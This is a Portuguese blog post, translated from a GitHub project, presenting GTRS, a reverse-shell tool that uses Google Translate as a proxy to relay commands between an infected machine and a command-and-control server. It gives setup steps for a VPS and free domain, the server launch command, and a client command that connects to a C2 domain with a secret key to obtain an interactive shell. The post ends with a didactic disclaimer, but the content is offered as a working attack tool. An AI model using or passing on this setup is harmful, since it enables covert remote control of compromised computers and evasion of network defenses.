Pular para o conteúdo

GTRS – Google Translator Reverse Shell

    Essas ferramentas utilizam o Google Translator como um proxy para enviar comandos arbitrários para uma máquina infectada. Por isto, conheçam o GTRS – Google Translator Reverse Shell.

    [INFECTED MACHINE] ==HTTPS==> [GOOGLE TRANSLATE] ==HTTP==> [C2]
    

    Configuração do Ambiente

    Primeiro você precisa de um VPS e um domínio. Para o domínio, você pode obter um gratuito no Freenom. No script client, defina seu domínio através da linha 5.

    Uso do GTRS

    Inicie o server.py em seu VPS:

    python2.7 server.py
    Server running on port: 80
    Secret Key: e294a11e-bb6f-49ed-b03a-9ec42be55062
    

    Ele irá te fornecer a chave secreta que será usada no client.sh. Em seguida, execute o client em um computador com acesso ao Google Translator, fornecendo domínio e a chave secreta gerada pelo servidor.

    bash client.sh www.c2server.ml e294a11e-bb6f-49ed-b03a-9ec42be55062
    

    Agora você tem um shell interativo usando arquivos pipe nomeados; YES you can cd into directories.

    Prova de Conceito (PoC)

    Problemas Conhecidos

    • Não é um problema, mas não sei se há um limite de rate no Google Translator;
    • O script client funciona no Mac e no Linux, mas no Linux você precisa instalar o xmllint que está no libxml2-utils.

    .

    * * * * *

    .

    Fonte: Github do projeto

    Tradução por Tiago Souza

    Disclaimer: Todas as informações aqui contidas são para fins didáticos e não para causar danos e prejuízos para alguém, usem sempre o conhecimento aqui compartilhado com ética e responsabilidade. Não nos responsabilizamos pela utilização indevida do conteúdo aqui exposto. Leia mais no aviso legal em nosso site.

    .

    Deixe um comentário

    O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

    Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.